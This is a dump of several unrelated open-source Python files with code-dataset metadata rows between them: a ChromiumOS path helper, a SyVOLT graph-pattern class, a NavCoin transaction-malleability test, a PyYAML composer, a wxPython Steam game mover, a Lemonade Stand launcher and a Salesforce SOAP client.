CROS_SRC_PLATFORM_PATH = os.path.join(CROSTOOLS_PATH_ROOT, 'src', 'platform')
CROS_AUTOTEST_PATH = os.path.join(CROSTOOLS_PATH_ROOT, 'src', 'third_party',
'autotest', 'files')
def _SysPathPrepend(dir_name):
"""Prepend a directory to Python's import path."""
if os.path.isdir(dir_name) and dir_name not in sys.path:
sys.path.insert(0, dir_name)
def FixupPath():
_SysPathPrepend(CROS_AUTOTEST_PATH)
_SysPathPrepend(CROS_SRC_PLATFORM_PATH)
_SysPathPrepend(CROSTOOLS_PATH_ROOT)
# TODO(dgarrett): Remove this call after all importers do it locally.
FixupPath()
| bsd-3-clause | 203,790,605,844,258,900 | 28.173913 | 77 | 0.717586 | false | 3.092166 | false | false | false |
levilucio/SyVOLT | GM2AUTOSAR_MM/Properties/from_eclipse/HP1_ConnectedLHS.py | 1 | 19004 | from core.himesis import Himesis, HimesisPreConditionPatternLHS
import uuid
class HP1_ConnectedLHS(HimesisPreConditionPatternLHS):
def __init__(self):
"""
Creates the himesis graph representing the AToM3 model HP1_ConnectedLHS.
"""
# Flag this instance as compiled now
self.is_compiled = True
super(HP1_ConnectedLHS, self).__init__(name='HP1_ConnectedLHS', num_nodes=0, edges=[])
# Set the graph attributes
self["mm__"] = ['MT_pre__FamiliesToPersonsMM', 'MoTifRule']
self["MT_constraint__"] = """#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
"""
self["name"] = """"""
self["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'P1')
# Set the node attributes
# match class PhysicalNode() node
self.add_node()
self.vs[0]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[0]["MT_label__"] = """1"""
self.vs[0]["MT_dirty__"] = False
self.vs[0]["mm__"] = """MT_pre__PhysicalNode"""
self.vs[0]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# match class Partition() node
self.add_node()
self.vs[1]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[1]["MT_label__"] = """2"""
self.vs[1]["MT_dirty__"] = False
self.vs[1]["mm__"] = """MT_pre__Partition"""
self.vs[1]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# match class Module() node
self.add_node()
self.vs[2]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[2]["MT_label__"] = """3"""
self.vs[2]["MT_dirty__"] = False
self.vs[2]["mm__"] = """MT_pre__Module"""
self.vs[2]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# match class Scheduler() node
self.add_node()
self.vs[3]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[3]["MT_label__"] = """4"""
self.vs[3]["MT_dirty__"] = False
self.vs[3]["mm__"] = """MT_pre__Scheduler"""
self.vs[3]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# match class Service() node
self.add_node()
self.vs[4]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[4]["MT_label__"] = """5"""
self.vs[4]["MT_dirty__"] = False
self.vs[4]["mm__"] = """MT_pre__Service"""
self.vs[4]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# Nodes that represent the edges of the property.
# match association PhysicalNode--partition-->Partition node
self.add_node()
self.vs[5]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "partition"
"""
self.vs[5]["MT_label__"] = """6"""
self.vs[5]["MT_subtypes__"] = []
self.vs[5]["MT_dirty__"] = False
self.vs[5]["mm__"] = """MT_pre__directLink_S"""
self.vs[5]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'assoc5')
# match association Partition--module-->Module node
self.add_node()
self.vs[6]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "module"
"""
self.vs[6]["MT_label__"] = """7"""
self.vs[6]["MT_subtypes__"] = []
self.vs[6]["MT_dirty__"] = False
self.vs[6]["mm__"] = """MT_pre__directLink_S"""
self.vs[6]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'assoc6')
# match association Module--scheduler-->Scheduler node
self.add_node()
self.vs[7]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "scheduler"
"""
self.vs[7]["MT_label__"] = """8"""
self.vs[7]["MT_subtypes__"] = []
self.vs[7]["MT_dirty__"] = False
self.vs[7]["mm__"] = """MT_pre__directLink_S"""
self.vs[7]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'assoc7')
# match association Scheduler--provided-->Service node
self.add_node()
self.vs[8]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "provided"
"""
self.vs[8]["MT_label__"] = """9"""
self.vs[8]["MT_subtypes__"] = []
self.vs[8]["MT_dirty__"] = False
self.vs[8]["mm__"] = """MT_pre__directLink_S"""
self.vs[8]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'assoc8')
# Add the edges
self.add_edges([
(0,5), # match_class PhysicalNode() -> association partition
(5,1), # association partition -> match_class Partition()
(1,6), # match_class Partition() -> association module
(6,2), # association module -> match_class Module()
(2,7), # match_class Module() -> association scheduler
(7,3), # association scheduler -> match_class Scheduler()
(3,8), # match_class Scheduler() -> association provided
(8,4) # association provided -> match_class Service()
])
# Add the attribute equations
self["equations"] = []
def eval_attr11(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr12(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr13(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr14(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr15(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr16(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "partition"
def eval_attr17(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "module"
def eval_attr18(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "scheduler"
def eval_attr19(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "provided"
def constraint(self, PreNode, graph):
"""
Executable constraint code.
@param PreNode: Function taking an integer as parameter
and returns the node corresponding to that label.
"""
#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
| mit | 5,550,988,573,478,345,000 | 51.788889 | 125 | 0.470375 | false | 5.183852 | false | false | false |
navcoindev/navcoin-core | qa/rpc-tests/txn_clone.py | 1 | 7549 | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test proper accounting with an equivalent malleability clone
#
from test_framework.test_framework import NavCoinTestFramework
from test_framework.util import *
class TxnMallTest(NavCoinTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 4
self.setup_clean_chain = False
def add_options(self, parser):
parser.add_option("--mineblock", dest="mine_block", default=False, action="store_true",
help="Test double-spend of 1-confirmed transaction")
def setup_network(self):
# Start with split network:
return super(TxnMallTest, self).setup_network(True)
def run_test(self):
# All nodes should start with 1,250 NAV:
starting_balance = 1250
for i in range(4):
assert_equal(self.nodes[i].getbalance(), starting_balance)
self.nodes[i].getnewaddress("") # bug workaround, coins generated assigned to first getnewaddress!
# Assign coins to foo and bar accounts:
self.nodes[0].settxfee(.001)
node0_address_foo = self.nodes[0].getnewaddress("foo")
fund_foo_txid = self.nodes[0].sendfrom("", node0_address_foo, 1219)
fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)
node0_address_bar = self.nodes[0].getnewaddress("bar")
fund_bar_txid = self.nodes[0].sendfrom("", node0_address_bar, 29)
fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)
assert_equal(self.nodes[0].getbalance(""),
starting_balance - 1219 - 29 + fund_foo_tx["fee"] + fund_bar_tx["fee"])
# Coins are sent to node1_address
node1_address = self.nodes[1].getnewaddress("from0")
# Send tx1, and another transaction tx2 that won't be cloned
txid1 = self.nodes[0].sendfrom("foo", node1_address, 40, 0)
txid2 = self.nodes[0].sendfrom("bar", node1_address, 20, 0)
# Construct a clone of tx1, to be malleated
rawtx1 = self.nodes[0].getrawtransaction(txid1,1)
clone_inputs = [{"txid":rawtx1["vin"][0]["txid"],"vout":rawtx1["vin"][0]["vout"]}]
clone_outputs = {rawtx1["vout"][0]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][0]["value"],
rawtx1["vout"][1]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][1]["value"]}
clone_locktime = rawtx1["locktime"]
clone_raw = self.nodes[0].createrawtransaction(clone_inputs, clone_outputs, clone_locktime)
# createrawtransaction randomizes the order of its outputs, so swap them if necessary.
# output 0 is at version+#inputs+input+sigstub+sequence+#outputs
# 40 NAV serialized is 00286bee00000000
pos0 = 2*(4+1+36+1+4+1)
hex40 = "00286bee00000000"
output_len = 16 + 2 + 2 * int("0x" + clone_raw[pos0 + 16 : pos0 + 16 + 2], 0)
if (rawtx1["vout"][0]["value"] == 40 and clone_raw[pos0 : pos0 + 16] != hex40 or
rawtx1["vout"][0]["value"] != 40 and clone_raw[pos0 : pos0 + 16] == hex40):
output0 = clone_raw[pos0 : pos0 + output_len]
output1 = clone_raw[pos0 + output_len : pos0 + 2 * output_len]
clone_raw = clone_raw[:pos0] + output1 + output0 + clone_raw[pos0 + 2 * output_len:]
# Use a different signature hash type to sign. This creates an equivalent but malleated clone.
# Don't send the clone anywhere yet
tx1_clone = self.nodes[0].signrawtransaction(clone_raw, None, None, "ALL|ANYONECANPAY")
assert_equal(tx1_clone["complete"], True)
# Have node0 mine a block, if requested:
if (self.options.mine_block):
self.nodes[0].generate(1)
sync_blocks(self.nodes[0:2])
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Node0's balance should be starting balance, plus 50NAV for another
# matured block, minus tx1 and tx2 amounts, and minus transaction fees:
expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
if self.options.mine_block: expected += 50
expected += tx1["amount"] + tx1["fee"]
expected += tx2["amount"] + tx2["fee"]
assert_equal(self.nodes[0].getbalance(), expected)
# foo and bar accounts should be debited:
assert_equal(self.nodes[0].getbalance("foo", 0), 1219 + tx1["amount"] + tx1["fee"])
assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
if self.options.mine_block:
assert_equal(tx1["confirmations"], 1)
assert_equal(tx2["confirmations"], 1)
# Node1's "from0" balance should be both transaction amounts:
assert_equal(self.nodes[1].getbalance("from0"), -(tx1["amount"] + tx2["amount"]))
else:
assert_equal(tx1["confirmations"], 0)
assert_equal(tx2["confirmations"], 0)
# Send clone and its parent to miner
self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
txid1_clone = self.nodes[2].sendrawtransaction(tx1_clone["hex"])
# ... mine a block...
self.nodes[2].generate(1)
# Reconnect the split network, and sync chain:
connect_nodes(self.nodes[1], 2)
self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
self.nodes[2].sendrawtransaction(tx2["hex"])
self.nodes[2].generate(1) # Mine another block to make sure we sync
sync_blocks(self.nodes)
# Re-fetch transaction info:
tx1 = self.nodes[0].gettransaction(txid1)
tx1_clone = self.nodes[0].gettransaction(txid1_clone)
tx2 = self.nodes[0].gettransaction(txid2)
# Verify expected confirmations
assert_equal(tx1["confirmations"], -2)
assert_equal(tx1_clone["confirmations"], 2)
assert_equal(tx2["confirmations"], 1)
# Check node0's total balance; should be same as before the clone, + 100 NAV for 2 matured,
# less possible orphaned matured subsidy
expected += 100
if (self.options.mine_block):
expected -= 50
assert_equal(self.nodes[0].getbalance(), expected)
assert_equal(self.nodes[0].getbalance("*", 0), expected)
# Check node0's individual account balances.
# "foo" should have been debited by the equivalent clone of tx1
assert_equal(self.nodes[0].getbalance("foo"), 1219 + tx1["amount"] + tx1["fee"])
# "bar" should have been debited by (possibly unconfirmed) tx2
assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
# "" should have starting balance, less funding txes, plus subsidies
assert_equal(self.nodes[0].getbalance("", 0), starting_balance
- 1219
+ fund_foo_tx["fee"]
- 29
+ fund_bar_tx["fee"]
+ 100)
# Node1's "from0" account balance
assert_equal(self.nodes[1].getbalance("from0", 0), -(tx1["amount"] + tx2["amount"]))
if __name__ == '__main__':
TxnMallTest().main()
| mit | -8,845,441,044,191,796,000 | 46.477987 | 111 | 0.592794 | false | 3.693249 | true | false | false |
croxis/SpaceDrive | spacedrive/renderpipeline/rplibs/yaml/yaml_py3/composer.py | 1 | 5020 |
__all__ = ['Composer', 'ComposerError']
from .error import MarkedYAMLError
from .events import *
from .nodes import *
class ComposerError(MarkedYAMLError):
pass
class Composer:
def __init__(self):
self.anchors = {}
def check_node(self):
# Drop the STREAM-START event.
if self.check_event(StreamStartEvent):
self.get_event()
# If there are more documents available?
return not self.check_event(StreamEndEvent)
def get_node(self):
# Get the root node of the next document.
if not self.check_event(StreamEndEvent):
return self.compose_document()
def get_single_node(self):
# Drop the STREAM-START event.
self.get_event()
# Compose a document if the stream is not empty.
document = None
if not self.check_event(StreamEndEvent):
document = self.compose_document()
# Ensure that the stream contains no more documents.
if not self.check_event(StreamEndEvent):
event = self.get_event()
raise ComposerError("expected a single document in the stream",
document.start_mark, "but found another document",
event.start_mark)
# Drop the STREAM-END event.
self.get_event()
return document
def compose_document(self):
# Drop the DOCUMENT-START event.
self.get_event()
# Compose the root node.
node = self.compose_node(None, None)
# Drop the DOCUMENT-END event.
self.get_event()
self.anchors = {}
return node
def compose_node(self, parent, index):
if self.check_event(AliasEvent):
event = self.get_event()
anchor = event.anchor
if anchor not in self.anchors:
raise ComposerError(None, None, "found undefined alias %r"
% anchor, event.start_mark)
return self.anchors[anchor]
event = self.peek_event()
anchor = event.anchor
if anchor is not None:
if anchor in self.anchors:
raise ComposerError("found duplicate anchor %r; first occurence"
% anchor, self.anchors[anchor].start_mark,
"second occurence", event.start_mark)
self.descend_resolver(parent, index)
if self.check_event(ScalarEvent):
node = self.compose_scalar_node(anchor)
elif self.check_event(SequenceStartEvent):
node = self.compose_sequence_node(anchor)
elif self.check_event(MappingStartEvent):
node = self.compose_mapping_node(anchor)
self.ascend_resolver()
return node
def compose_scalar_node(self, anchor):
event = self.get_event()
tag = event.tag
if tag is None or tag == '!':
tag = self.resolve(ScalarNode, event.value, event.implicit)
node = ScalarNode(tag, event.value,
event.start_mark, event.end_mark, style=event.style)
if anchor is not None:
self.anchors[anchor] = node
return node
def compose_sequence_node(self, anchor):
start_event = self.get_event()
tag = start_event.tag
if tag is None or tag == '!':
tag = self.resolve(SequenceNode, None, start_event.implicit)
node = SequenceNode(tag, [],
start_event.start_mark, None,
flow_style=start_event.flow_style)
if anchor is not None:
self.anchors[anchor] = node
index = 0
while not self.check_event(SequenceEndEvent):
node.value.append(self.compose_node(node, index))
index += 1
end_event = self.get_event()
node.end_mark = end_event.end_mark
return node
def compose_mapping_node(self, anchor):
start_event = self.get_event()
tag = start_event.tag
if tag is None or tag == '!':
tag = self.resolve(MappingNode, None, start_event.implicit)
node = MappingNode(tag, [],
start_event.start_mark, None,
flow_style=start_event.flow_style)
if anchor is not None:
self.anchors[anchor] = node
while not self.check_event(MappingEndEvent):
#key_event = self.peek_event()
item_key = self.compose_node(node, None)
#if item_key in node.value:
# raise ComposerError("while composing a mapping", start_event.start_mark,
# "found duplicate key", key_event.start_mark)
item_value = self.compose_node(node, item_key)
#node.value[item_key] = item_value
node.value.append((item_key, item_value))
end_event = self.get_event()
node.end_mark = end_event.end_mark
return node
| mit | 6,579,740,711,259,711,000 | 34.115108 | 89 | 0.564343 | false | 4.200837 | false | false | false |
benopotamus/steam-game-mover | main.py | 1 | 4905 | #!/usr/bin/env python
'''Allows easy moving (with symlinking) of folders to and from the SteamApps folder.
Intended for users with an SSD that cannot hold all their Steam games. Allows them to easily move games not currently being played to a slower drive easily. And then move them back at a later date. The symlinking means the games can still be played regardless of which drive they are on.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import os, wx
import layout, Model
from wx.lib.pubsub import Publisher as pub
class Frame(layout.MainFrame):
'''Used wxFormBuilder to create the UI so create an instance of that and overwrite necessary methods and attributes)'''
def __init__(self, parent):
super( Frame, self ).__init__(parent)
#### The following binds/subscribes controller functions to model broadcasts ####
# These will all just take the broadcast and update the view/widgets from layout.py
pub.subscribe(self.primary_path_changed, "PRIMARY PATH CHANGED")
pub.subscribe(self.secondary_path_changed, "SECONDARY PATH CHANGED")
pub.subscribe(self.games_move_to_secondary, "GAMES MOVED TO SECONDARY")
pub.subscribe(self.games_move_to_primary, "GAMES MOVED TO PRIMARY")
pub.subscribe(self.display_move_dialog, "MOVING GAMES")
pub.subscribe(self.window_size_changed, "WINDOW SIZE CHANGED")
pub.subscribe(self.window_coords_changed, "WINDOW COORDS CHANGED")
pub.subscribe(self.use_default_window_size, "NO SIZE FOUND")
# Model is created after subscriptions because it broadcasts on instantiation (when it gets settings from config file)
self.model = Model.Model()
#### The following 'on' methods are bound to the widgets in layout.py ####
def on_games_move( self, event ):
if event.GetEventObject().GetName() == 'move_to_secondary_button':
games = self.left_listbox.GetSelectionsStrings()
self.model.move_games_to_secondary(games)
elif event.GetEventObject().GetName() == 'move_to_primary_button':
games = self.right_listbox.GetSelectionsStrings()
self.model.move_games_to_primary(games)
event.Skip()
def on_change_primary_dir_choice(self, event):
# In this case we include a "New directory" button.
dlg = wx.DirDialog(self, "Choose a directory:", style=wx.DD_DEFAULT_STYLE)
if dlg.ShowModal() == wx.ID_OK:
self.model.change_primary_path(dlg.GetPath())
# Only destroy a dialog after we're done with it
dlg.Destroy()
def on_change_secondary_dir_choice(self, event):
# In this case we include a "New directory" button.
dlg = wx.DirDialog(self, "Choose a directory:", style=wx.DD_DEFAULT_STYLE)
if dlg.ShowModal() == wx.ID_OK:
self.model.change_secondary_path(dlg.GetPath())
# Only destroy a dialog after we're done with it
dlg.Destroy()
def on_frame_close( self, event ):
''' Save window position and size on close'''
self.model.change_window_size(self.GetSize())
self.model.change_window_coords(self.GetPosition())
event.Skip()
#### Broadcast response methods ####
def primary_path_changed(self,message):
self.primary_dir_choice_button.SetLabel(message.data['path'])
self.left_listbox.SetItems(message.data['path_folders'])
def secondary_path_changed(self,message):
self.secondary_dir_choice_button.SetLabel(message.data['path'])
self.right_listbox.SetItems(message.data['path_folders'])
def games_move_to_secondary(self,message):
self.left_listbox.SetItems(message.data['primary_path_folders'])
self.right_listbox.SetItems(message.data['secondary_path_folders'])
# Same method for games_move_to_primary
games_move_to_primary = games_move_to_secondary
def window_size_changed(self,message):
self.SetSize(message.data)
def window_coords_changed(self,message):
self.SetPosition(message.data)
def use_default_window_size(self,message):
self.Fit()
def display_move_dialog(self, message):
'''When model broadcasts games are being moved, creates a file moving (progress) dialog'''
self.progress_dialog = layout.Moving_progress_dialog(self, message.data['initial_path'], message.data['final_path'], message.data['game_names'])
class App(wx.App):
def OnInit(self):
self.frame = Frame(parent=None)
self.frame.Show()
self.SetTopWindow(self.frame)
return True
if __name__ == '__main__':
app = App()
app.MainLoop()
| gpl-2.0 | -7,643,176,816,354,137,000 | 37.320313 | 287 | 0.733741 | false | 3.437281 | false | false | false |
FOSSRIT/lemonade-stand | LemonadeStand.py | 1 | 1785 | #!/usr/bin/env python
from fortuneengine.GameEngine import GameEngine
from LemonadeMain import LemonadeMain
from LemonadeGui import LemonadeGui
from optparse import OptionParser
from pygame import font
parser = OptionParser()
parser.add_option("", "--width", dest="width", help="window width",
metavar="WIDTH", default=1200, type="int")
parser.add_option("", "--height", dest="height", help="window height",
metavar="HEIGHT", default=855, type="int")
parser.add_option("-f", "--font", dest="font", help="font size",
metavar="SIZE", default=36, type="int")
parser.add_option("", "--shopFont", dest="shopFont", help="shop font size",
metavar="SHOPSIZE", default="48", type="int")
parser.add_option("", "--shopNumFont", dest="shopNumFont",
help="shop number font size", metavar="SHOPNUMSIZE",
default="72", type="int")
parser.add_option("", "--menuFont", dest="menuFont", help="menu font",
metavar="MENUFONT", default="90", type="int")
parser.add_option("-d", "--difficulty", dest="difficulty",
help="difficulty level", metavar="DIFFICULTY",
default=0, type="int")
(opts, args) = parser.parse_args()
ge = GameEngine(width=opts.width, height=opts.height, always_draw=False)
ge.add_object('font', font.SysFont(font.get_default_font(), opts.font))
ge.add_object('shopFont', font.SysFont(font.get_default_font(), opts.shopFont))
ge.add_object('shopNumFont', font.SysFont(font.get_default_font(),
opts.shopNumFont))
ge.add_object('menuFont', font.SysFont(font.get_default_font(), opts.menuFont))
ge.add_object('main', LemonadeMain(opts.difficulty))
ge.add_object('gui', LemonadeGui())
ge.start_main_loop()
| gpl-3.0 | 6,978,417,313,381,393,000 | 39.568182 | 79 | 0.648179 | false | 3.506876 | false | true | false |
heroku/python-salesforce-client | salesforce/soap/base.py | 1 | 5676 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
import logging
import urlparse
logger = logging.getLogger(__name__)
try:
import suds.client
if suds.__version__ < '0.6':
raise ImportError
except ImportError:
logger.error("The metadata API requires suds-jurko >= 0.6")
exit()
from requests import Session
from requests.adapters import BaseAdapter
from requests.auth import HTTPBasicAuth
from requests.models import Response
from suds import WebFault
from suds.client import Client
from suds.plugin import MessagePlugin
from suds.properties import Unskin
from suds.transport import Transport, TransportError, Reply
class FileAdapter(BaseAdapter):
def send(self, request, **kwargs):
response = Response()
response.headers = {}
response.encoding = 'utf-8' # FIXME: this is a complete guess
response.url = request.url
response.request = request
response.connection = self
try:
response.raw = open(request.url.replace('file://', ''), 'r')
except IOError as e:
response.status_code = 404
return response
response.status_code = 200
return response
def close(self):
pass
class RequestsHttpTransport(Transport):
def __init__(self, session=None, **kwargs):
Transport.__init__(self)
Unskin(self.options).update(kwargs)
self.session = session or Session()
# Suds expects support for local files URIs.
self.session.mount('file://', FileAdapter())
def _call(self, request, method):
headers = dict(self.options.headers)
headers.update(request.headers)
if self.options.username and self.options.password:
auth = HTTPBasicAuth(self.options.username, self.options.password)
else:
auth = None
response = getattr(self.session, method)(request.url,
auth=auth,
data=request.message,
headers=headers,
timeout=self.options.timeout,
proxies=self.options.proxy,
stream=True)
return response
def open(self, request):
return self._call(request, 'get').raw
def send(self, request):
response = self._call(request, 'post')
return Reply(response.status_code, response.headers, response.content)
class SalesforceSoapClientBase(object):
@property
def version(self):
raise NotImplementedError('Subclasses must specify a version.')
@property
def wsdl_path(self):
raise NotImplementedError('Subclasses must specify a wsdl path.')
def __init__(self, client_id, client_secret, domain, access_token,
refresh_token=None, token_updater=None):
# This plugin is needed in order to keep empty complex objects from
# getting sent in the soap paylaod.
class PrunePlugin(MessagePlugin):
def marshalled(self, context):
context.envelope[1].prune()
wsdl = 'file://{0}'.format(self.wsdl_path)
self.client = Client(wsdl, transport=RequestsHttpTransport(),
plugins=[PrunePlugin()])
self._set_session_header(access_token)
endpoint = 'https://{0}/services/Soap/m/{1}/{2}'.format(
domain,
self.version,
access_token.split('!', 1)[0], # Salesforce org ID
)
self.client.set_options(location=endpoint)
if refresh_token is not None:
from ..rest import SalesforceRestClient
self.rest_client = SalesforceRestClient(client_id, client_secret,
domain,
access_token=access_token,
refresh_token=refresh_token,
token_updater=token_updater)
else:
self.rest_client = None
@staticmethod
def login(wsdl_path, username, password, token):
client = Client('file://{0}'.format(wsdl_path))
response = client.service.login(username, password + token)
return (
response.sessionId,
urlparse.urlparse(response.serverUrl).netloc,
)
def _set_session_header(self, access_token):
session_header = self.client.factory.create('SessionHeader')
session_header.sessionId = access_token
headers = {
'SessionHeader': session_header
}
self.client.set_options(soapheaders=headers)
def _call(self, function_name, args=None, kwargs=None):
args = args or []
kwargs = kwargs or {}
func = getattr(self.client.service, function_name)
# TODO: parse response, return something actually useful
try:
return func(*args, **kwargs)
except WebFault as e:
# Detect whether the failure is due to an invalid session, and if
# possible, try to refresh the access token.
if (hasattr(e, 'fault') and
e.fault.faultcode == 'sf:INVALID_SESSION_ID' and
self.rest_client):
token = self.rest_client._refresh_token()
if token:
self._set_session_header(token['access_token'])
return func(*args, **kwargs)
raise
| mit | 1,096,312,723,674,942,000 | 34.037037 | 80 | 0.570825 | false | 4.667763 | false | false | false |
elbeardmorez/quodlibet | quodlibet/quodlibet/ext/events/visualisations.py | 1 | 3329 | # -*- coding: utf-8 -*-
# Copyright 2017 Nick Boultbee
#
